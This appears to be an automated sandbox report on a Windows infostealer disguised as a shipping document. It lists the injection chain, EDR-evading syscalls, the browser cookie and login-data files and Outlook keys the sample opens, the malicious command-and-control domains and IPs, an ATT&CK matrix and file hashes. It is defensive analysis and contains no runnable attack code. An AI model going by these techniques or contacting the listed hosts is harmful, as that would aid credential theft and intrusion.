            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\netbtugc.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread register set: target process: 7940
            Source: C:\Windows\SysWOW64\netbtugc.exe | Thread APC queued: target process: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 27F1008
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E58A73 LogonUserW
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E03B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E04A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E64CFA mouse_event
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe"
            Source: C:\Program Files (x86)\sjLtPMjzgWJhBHiifztBWVjhIDgLZXCZgXmSMnQCayzZ\PrWIbKXhdqUKk.exe | Process created: C:\Windows\SysWOW64\netbtugc.exe "C:\Windows\SysWOW64\netbtugc.exe"
            Source: C:\Windows\SysWOW64\netbtugc.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E581D4 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E64A08 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: SHIPPING DOC MBL+HBL.exe, PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: PrWIbKXhdqUKk.exe, 00000005.00000000.2047583367.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000005.00000002.3566730192.0000000001630000.00000002.00000001.00040000.00000000.sdmp, PrWIbKXhdqUKk.exe, 00000008.00000002.3567038470.0000000000EA0000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: }Program Manager
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E287AB cpuid
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E35007 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E4215F GetUserNameW
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E340BA __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E04AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\netbtugc.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\netbtugc.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_81
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_XP
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_XPe
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_VISTA
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_7
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: WIN_8
            Source: SHIPPING DOC MBL+HBL.exe | Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match | File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match | File source: 00000001.00000002.2131318736.00000000030D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3566928575.0000000003400000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000008.00000002.3568694635.0000000004C80000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2129407938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3567072049.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3565538257.0000000003050000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3567001047.00000000036E0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000001.00000002.2132245829.0000000004200000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E76399 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe | Code function: 0_2_00E7685D socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            MITRE ATT&CK Matrix

            One column per tactic; a leading number in a cell is the report's count of matched signatures for that technique, cells without a number are unmatched techniques shown for context.

            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
            Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
            Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
            Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 2 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction
            Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
            Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
            DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
            Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
            Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            Behavior Graph ID: 1511196
            Sample: SHIPPING DOC MBL+HBL.exe
            Startdate: 14/09/2024
            Architecture: WINDOWS
            Score: 100

            Start
              DNS/IP: www.siyue.xyz; www.quantumnests.xyz (Performs DNS queries to domains with low reputation); 14 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Multi AV Scanner detection for submitted file; 5 other signatures
              • SHIPPING DOC MBL+HBL.exe [2] (started)
                Signatures: Binary is likely a compiled AutoIt script file; Writes to foreign memory regions; Maps a DLL or memory area into another process
                • svchost.exe (started)
                  Signatures: Maps a DLL or memory area into another process
                  • PrWIbKXhdqUKk.exe (injected)
                    Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    • netbtugc.exe [13] (started)
                      Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                      • PrWIbKXhdqUKk.exe (injected)
                        DNS/IP: www.independent200.org 103.42.108.46 (ports 49746, 49747, 49748; SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU, Australia); parcelfly.net 84.32.84.32 (ports 49762, 49763, 49764; NTT-LT-ASLT, Lithuania); 5 other IPs or domains
                        Signatures: Found direct / indirect Syscall (likely to bypass EDR)
                      • firefox.exe (started)

            Source | Detection | Scanner | Label
            SHIPPING DOC MBL+HBL.exe | 63% | ReversingLabs | Win32.Trojan.Generic
            SHIPPING DOC MBL+HBL.exe | 35% | Virustotal |
            SHIPPING DOC MBL+HBL.exe | 100% | Joe Sandbox ML |
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner
            www.independent200.org | 1% | Virustotal
            chamadaslotgiris.net | 0% | Virustotal
            dns.ladipage.com | 0% | Virustotal
            www.personal-loans-jp8.xyz | 1% | Virustotal
            tigre777gg.online | 0% | Virustotal
            www.mediaplug.biz | 0% | Virustotal
            parcelfly.net | 0% | Virustotal
            www.abbabyfernando.online | 1% | Virustotal
            www.masteriocp.online | 1% | Virustotal
            www.parcelfly.net | 0% | Virustotal
            www.chamadaslotgiris.net | 2% | Virustotal
            www.tigre777gg.online | 1% | Virustotal
            www.monos.shop | 0% | Virustotal
            Name | IP | Active | Malicious | Reputation
            www.independent200.org | 103.42.108.46 | true | true | unknown
            chamadaslotgiris.net | 3.33.130.190 | true | true | unknown
            dns.ladipage.com | 18.139.62.226 | true | true | unknown
            www.personal-loans-jp8.xyz | 199.59.243.226 | true | true | unknown
            www.quantumnests.xyz | 162.0.239.141 | true | true | unknown
            tigre777gg.online | 3.33.130.190 | true | true | unknown
            www.mediaplug.biz | 66.81.203.10 | true | true | unknown
            parcelfly.net | 84.32.84.32 | true | true | unknown
            www.parcelfly.net | unknown | unknown | true | unknown
            www.siyue.xyz | unknown | unknown | true | unknown
            www.linkbasic.net | unknown | unknown | true | unknown
            www.monos.shop | unknown | unknown | true | unknown
            www.masteriocp.online | unknown | unknown | true | unknown
            www.abbabyfernando.online | unknown | unknown | true | unknown
            www.chamadaslotgiris.net | unknown | unknown | true | unknown
            www.tigre777gg.online | unknown | unknown | true | unknown
                  IP | Domain | Country | ASN | ASN Name | Malicious
                  18.139.62.226 | dns.ladipage.com | United States | 16509 | AMAZON-02US | true
                  162.0.239.141 | www.quantumnests.xyz | Canada | 22612 | NAMECHEAP-NETUS | true
                  66.81.203.10 | www.mediaplug.biz | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
                  199.59.243.226 | www.personal-loans-jp8.xyz | United States | 395082 | BODIS-NJUS | true
                  84.32.84.32 | parcelfly.net | Lithuania | 33922 | NTT-LT-ASLT | true
                  103.42.108.46 | www.independent200.org | Australia | 45638 | SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU | true
                  3.33.130.190 | chamadaslotgiris.net | United States | 8987 | AMAZONEXPANSIONGB | true
                  Joe Sandbox version: 40.0.0 Tourmaline
                  Analysis ID: 1511196
                  Start date and time: 2024-09-14 11:09:14 +02:00
                  Joe Sandbox product: CloudBasic
                  Overall analysis duration: 0h 8m 54s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Run name: Run with higher sleep bypass
                  Number of new started processes analysed: 9
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 2
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Sample name: SHIPPING DOC MBL+HBL.exe
                  Detection: MAL
                  Classification: mal100.troj.spyw.evad.winEXE@7/3@13/7
                  EGA Information:
                  • Successful, ratio: 66.7%
                  HCA Information:
                  • Successful, ratio: 85%
                  • Number of executed functions: 50
                  • Number of non-executed functions: 270
                  Cookbook Comments:
                  • Found application associated with file extension: .exe
                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes were analyzed; the report is missing behavior information
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  Time | Type | Description
                  05:11:27 | API Interceptor | 6172468x Sleep call for process: netbtugc.exe modified
                  Process: C:\Windows\SysWOW64\netbtugc.exe
                  File Type: SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                  Category: dropped
                  Size (bytes): 114688
                  Entropy (8bit): 0.9746603542602881
                  Encrypted: false
                  SSDEEP: 192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                  MD5: 780853CDDEAEE8DE70F28A4B255A600B
                  SHA1: AD7A5DA33F7AD12946153C497E990720B09005ED
                  SHA-256: 1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                  SHA-512: E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                  Malicious: false
                  Reputation: high, very likely benign file
                  Process:C:\Users\user\Desktop\SHIPPING DOC MBL+HBL.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):287744
                  Entropy (8bit):7.995430162645649
                  Encrypted:true
                  SSDEEP:6144:4jk++vBTV4FUfb9mKydXwr3s5gZJQEj87FvtgQ3o3QuLeC3:hBvBTV4Gfb91SwYgZj87n3o3QQ
                  MD5:C0B7D225D31BA2653AEF8F8EC8598FEF
                  SHA1:31A499385D24C8E112ED717723D2316BDFABE2DC
                  SHA-256:1EB42C56A454BD83B0D20D2B3551ACC9E8B9DDDB973BDE7798CC738FA53E9FB5
                  SHA-512:BF66564984C49E3798C5A83DA09CCC4C6E0FB60F38E45DC77901A7339C1D5080E055BAE64CA6451AF71B12369C709690F6C9C09F25F771165E95CCB7E00A543A
                  Malicious:false
                  Reputation:low
                  Preview:...a.QY1T...1....t.NH..e7_...F3ZQY1TECX8A2F1HBNKNWLM4WEYWF3.QY1ZZ.V8.;...C..o.$$Gw5+8!A;<yR5+-7LaP#.:7 k'9l.{.e48"Vt\T;pECX8A2FHIK.v.0.pT0.d7!.@...n%$."..(%.Q...qT0..>%[g1>.TECX8A2Fa.BN.OVL...YWF3ZQY1.EAY3@9F1.FNKNWLM4WE9CF3ZAY1T5GX8ArF1XBNKLWLK4WEYWF3\QY1TECX816F1JBNKNWLO4..YWV3ZAY1TESX8Q2F1HBN[NWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX.5W>EHBN..SLM$WEY.B3ZAY1TECX8A2F1HBNkNW,M4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBNKNWLM4WEYWF3ZQY1TECX8A2F1HBN
                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Entropy (8bit):7.260050940909476
                  TrID:
                  • Win32 Executable (generic) a (10002005/4) 99.96%
                  • Generic Win/DOS Executable (2004/3) 0.02%
                  • DOS Executable Generic (2002/1) 0.02%
                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                  File name:SHIPPING DOC MBL+HBL.exe
                  File size:1'280'512 bytes
                  MD5:e57f3cdd911cbaf924bf1e6e7dcc7795
                  SHA1:eba646965b6549a2cc716c20f128d989cd192f50
                  SHA256:61b3a4a9ae0b5189dd42a97b9c680e3787d9d3da3b481701e5795d16480141b1
                  SHA512:8692f8951faac03450c36112dd2627e557b827f86c3bcfe21749ffb2e54f145a284e9e7c1ac1a891c97b995862aa12014d2f0c0fc9597c296c3c673e5da2dc22
                  SSDEEP:24576:4Cdxte/80jYLT3U1jfsWarjhjvXZrPWEckImNQ:Rw80cTsjkWar5lOXkk
                  TLSH:F455CF2273DDC371CB669173BF6AB7016EBF78610630B85B2F880D7DA950162162DB63
                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..
                  Icon Hash:aaf3e3e3938382a0
                  Entrypoint:0x427f4a
                  Entrypoint Section:.text
                  Digitally signed:false
                  Imagebase:0x400000
                  Subsystem:windows gui
                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                  Time Stamp:0x66E37C1B [Thu Sep 12 23:41:15 2024 UTC]
                  TLS Callbacks:
                  CLR (.Net) Version:
                  OS Version Major:5
                  OS Version Minor:1
                  File Version Major:5
                  File Version Minor:1
                  Subsystem Version Major:5
                  Subsystem Version Minor:1
                  Import Hash:afcdf79be1557326c854b6e20cb900a7
                  Instruction
                  call 00007FEFE91C946Dh
                  jmp 00007FEFE91BC234h
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  int3
                  push edi
                  push esi
                  mov esi, dword ptr [esp+10h]
                  mov ecx, dword ptr [esp+14h]
